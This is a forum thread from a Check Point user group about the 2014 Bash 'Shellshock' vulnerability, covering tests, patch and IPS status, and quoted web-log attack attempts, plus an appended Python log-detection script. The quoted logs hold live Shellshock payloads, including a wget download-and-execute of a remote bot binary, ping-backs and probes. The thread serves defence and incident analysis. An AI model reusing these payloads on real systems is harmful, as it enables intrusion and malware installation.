CPUG: The Check Point User Group


Thread: Bash Vulnerability

  1. #1
    Bash Vulnerability

    https://access.redhat.com/articles/1200223

    Affects Gaia R77.20:

    # env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    vulnerable
    this is a test
    Last edited by melipla; 2014-09-24 at 13:29.

  2. #2
    Re: Bash Vulnerability

    Looks like Check Point is tracking this in sk102673.

  3. #3
    Re: Bash Vulnerability

    SK102673 lists Gaia and SecurePlatform OS. My testing shows IPSO 6.2-GA083a02 also vulnerable.

  4. #4
    Re: Bash Vulnerability

    So we can see that our bash is vulnerable in that it will keep parsing commands after the function definition has ended, but is there a real attack vector from the outside? That is, putting aside examples where someone already has credentials and is escalating privilege.

    For example, do we meet any conditions in the links below, or in Petkov's blog, such that a stranger could pass the malicious environment variable?

    https://securityblog.redhat.com/2014...ection-attack/

    https://community.rapid7.com/communi...-cve-2014-6271

    I'm not familiar enough with the back end and it would be good to be able to tell customers whether we implement anything that provides an attack vector, until the protection is released.

  5. #5
    Re: Bash Vulnerability

    There has been an IPS update to catch this.

  6. #6
    Re: Bash Vulnerability

    This could get ugly fairly fast.

    https://www.trustedsec.com/september...proof-concept/ - I wonder how many home routers have a bash shell in their innards.

    I've already seen exploit code that looks like it could run rm -rf / if Apache is running as root.

    There just seem to be a ton of vectors.

  7. #7
    Re: Bash Vulnerability

    Whilst there is an IPS protection released for this, is there going to be a patch made available for the actual platforms themselves? Also, there are still a number of people that don't buy the IPS subscriptions, which an IPS update won't help for.

  8. #8
    Re: Bash Vulnerability

    Quote Originally Posted by mcnallym View Post
    Whilst there is an IPS protection released for this, is there going to be a patch made available for the actual platforms themselves? Also, there are still a number of people that don't buy the IPS subscriptions, which an IPS update won't help for.
    There are new bash versions available
    https://supportcenter.checkpoint.com...ionid=sk102673

  9. #9
    Re: Bash Vulnerability

    I have 2 independent SMS's, along with 10 gateways licensed for IPS. After sk102673 was updated on Thursday stating an IPS signature had been released (http://www.checkpoint.com/defense/ad...-25-sep-2.html) I downloaded updates to one of my SMS's. No protection for GNU BASH is listed in the update. This morning I updated my 2nd SMS, again no IPS sig for BASH. My update version is 634146421 on both SMS's.

    Has anyone else experienced trouble getting this signature?

    Edit to add.... My SMS's are R77.1 and gateways are combination of R77.1 and R75.47
    Last edited by dbrown3611; 2014-09-26 at 12:16. Reason: version info

  10. #10
    Re: Bash Vulnerability

    No issue here. Running R77.20 Update revision 634146421. Protection GNU Bash Remote Code Execution

  11. #11
    Re: Bash Vulnerability

    So I know the WebUI is a vector for this issue, but does anyone know if Legacy Client Auth is?

  12. #12
    Re: Bash Vulnerability

    Quote Originally Posted by jflemingeds View Post
    So I know the WebUI is a vector for this issue, but does anyone know if Legacy Client Auth is?
    I thought I replied to this, but I guess I didn't submit. Support said Legacy Client Auth is not affected.

  13. #13
    Re: Bash Vulnerability

    Has anyone noticed any hits on the Bash IPS Protection? Any logs from that Protection at all?

  14. #14
    Re: Bash Vulnerability

    Just some false positives outbound. We added an exclusion for the proxy as source.

  15. #15
    Re: Bash Vulnerability

    A bit of clarification.
    Any system that has bash on it is vulnerable, i.e. IPSO, SPLAT, etc. The R version is not really relevant in this respect.
    If you run tests on R70-R65 IPSO 4.2 it still comes up vulnerable.
    The solutions covered in the SK work just on the listed versions for now, although the list is growing fast.
    Until Sunday the situation was further confused by a mismatched reference, where the header said "All" systems and platforms and a disclaimer at the very last line of the text listed a number of tested versions for which the solution was ready.
    I missed this originally and me and my colleagues spent a merry 40 minutes trying to figure out why it didn't work on R70 IPSO 6.2.

  16. #16
    Re: Bash Vulnerability

    According to this article, bash is still vulnerable. Expect more patching to be done.

  17. #17
    Re: Bash Vulnerability

    I've got a few hits.

    http://() { :; }; ping -c 3 188.165.227.201/
    http://() { :; }; /bin/ping -c 3 5.61.38.5/

    Looks like they're just waiting for pingbacks to attempt something further.

  18. #18
    Re: Bash Vulnerability

    WebUIs are only potentially vulnerable if a bash script is used for a CGI script.
    Legacy Client Auth should not use bash, thus not vulnerable.

    Check Point is continuing to update sk102673 as appropriate with updated information and fixes for this issue, including for some officially "out of support" versions.

  19. #19
    Re: Bash Vulnerability

    Hi

    I read this article today and it presents a slightly different approach with regard to this new bug.
    It is strongly recommended to read and learn.

    http://www.sentrix.com/being-exploit...k-is-needless/

    Full disclosure: I am employed at CHECK POINT and I have no interest in SENTRIX;
    the information is shared because it is of interest to security people.

    Regards,
    Guy

  20. #20
    Re: Bash Vulnerability

    I have some interesting hits on my box so far.

    Code:
    nginx-access.log:209.126.230.72 - - [25/Sep/2014:01:41:36 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    (A security guy doing a scan.)

    Code:
    nginx-access.log:89.207.135.125 - - [25/Sep/2014:05:12:49 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 444 0 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    (No motives announced. This was reported to the abuse contact of the address block for the originating address. They replied that the server was found to have been compromised and was reinstalled.)

    Code:
    nginx-access.log:54.251.83.67 - - [26/Sep/2014:23:54:37 -0500] "GET / HTTP/1.1" 444 0 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
    (Not sure what this is supposed to accomplish.)


    Attempts to get an IRC bot with DDoS and other functions:

    Code:
    nginx-access.log:63.131.141.125 - - [27/Sep/2014:03:39:57 -0500] "GET / HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
    nginx-access.log:63.131.141.125 - - [27/Sep/2014:03:39:57 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
    nginx-access.log:63.131.141.125 - - [27/Sep/2014:03:39:57 -0500] "GET /test HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
    Just pings (possibly DDoSing, or counting vulnerable machines?)

    Code:
    nginx-access.log:176.31.248.153 - - [27/Sep/2014:18:40:03 -0500] "GET / HTTP/1.0" 444 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0Cookie: () { :; }; /usr/bin/env ping -c 3 46.105.77.107Host: () { :; }; /usr/bin/env ping -c 3 46.105.77.107Referer: () { :; }; /usr/bin/env ping -c 3 46.105.77.107Cookie: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 46.105.77.107'; cat echoHost: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 46.105.77.107'; cat echoReferer: /usr/bin/env X='() { (a)=>' bash -c 'echo /usr/bin/env ping -c 3 46.105.77.107'; cat echoAccept: */*"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:09:11:43 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:13:05:53 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:15:21:41 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:16:45:26 -0500] "GET /cgi-bin/redirect.cgi HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:188.165.227.201 - - [29/Sep/2014:17:51:47 -0500] "GET /cgi-bin/redirect.cgi HTTP/1.0" 444 0 "() { :; }; /bin/ping -c 3 188.165.227.201" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3"
    nginx-access.log:46.161.41.142 - - [29/Sep/2014:18:43:59 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 46.161.41.142" "() { :; }; ping -c 46.161.41.142"
    Also counting?

    Code:
    nginx-access.log:82.221.105.197 - - [30/Sep/2014:02:45:17 -0500] "GET / HTTP/1.1" 444 0 "-" "() { :;}; /bin/bash -c \x22wget http://82.221.105.197/bash-count.txt\x22"
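    A detection pass over access-log lines of the kind quoted in this thread, added here as an example (it is not code from the thread, from Check Point, or from any of the posters): it flags requests whose Referer or User-Agent carries the Shellshock function-definition trigger and sorts them into the activity types the posts observed (ping-backs, download-and-execute, probing). The log lines inside are constructed with documentation addresses, and the log-format regex and the classification heuristics are assumptions of this example.

```python
import re

# Constructed sample lines in the nginx combined-log shape of the hits quoted
# above; addresses are from documentation ranges, not the ones in the posts.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Sep/2014:01:41:36 -0500] "GET / HTTP/1.0" 444 0 "() { :; }; ping -c 3 198.51.100.7" "scanner/1.0"
192.0.2.11 - - [27/Sep/2014:03:39:57 -0500] "GET /cgi-bin/test.sh HTTP/1.0" 444 0 "-" "() { :;}; /bin/bash -c \\x22wget -O /var/tmp/x 198.51.100.8/x;chmod +x /var/tmp/x;/var/tmp/x\\x22"
192.0.2.12 - - [26/Sep/2014:23:54:37 -0500] "GET / HTTP/1.1" 444 0 "-" "() { :;}; /bin/bash -c \\x22echo testing\\x22; /bin/uname -a"
192.0.2.13 - - [28/Sep/2014:10:00:00 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Firefox/31.0"
"""

# ip - user [time] "request" status bytes "referer" "user-agent"; quoted fields
# may contain nginx's \xHH escapes, so a backslash-escaped char is allowed.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \d+ '
                     r'"((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"')
# The Shellshock trigger: an empty function body followed by trailing commands.
TRIGGER_RE = re.compile(r'\(\)\s*\{\s*:;?\s*\}\s*;')

def unescape(field):
    """Undo nginx's \\xHH escaping so quotes inside payloads read naturally."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), field)

def classify(payload):
    """Coarse intent of the injected command (heuristic), mirroring what the posts saw."""
    if re.search(r'\b(wget|curl)\b', payload):
        return 'download-and-execute'
    if re.search(r'\bping\b', payload):
        return 'ping-back'
    if re.search(r'\b(echo|uname|id)\b', payload):
        return 'probe'
    return 'other'

def scan_log(text):
    """One record per request whose Referer or User-Agent carries the trigger."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, request, status, referer, agent = m.groups()
        for field, raw in (('referer', referer), ('user-agent', agent)):
            if TRIGGER_RE.search(raw):
                payload = unescape(raw)
                hits.append({'ip': ip, 'time': ts, 'request': request, 'status': status,
                             'field': field, 'kind': classify(payload), 'payload': payload})
    return hits
```

    Run it on a real file with `scan_log(open('access.log').read())`; lines copied out of grep output still carry the `nginx-access.log:` filename prefix and should have it stripped first.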
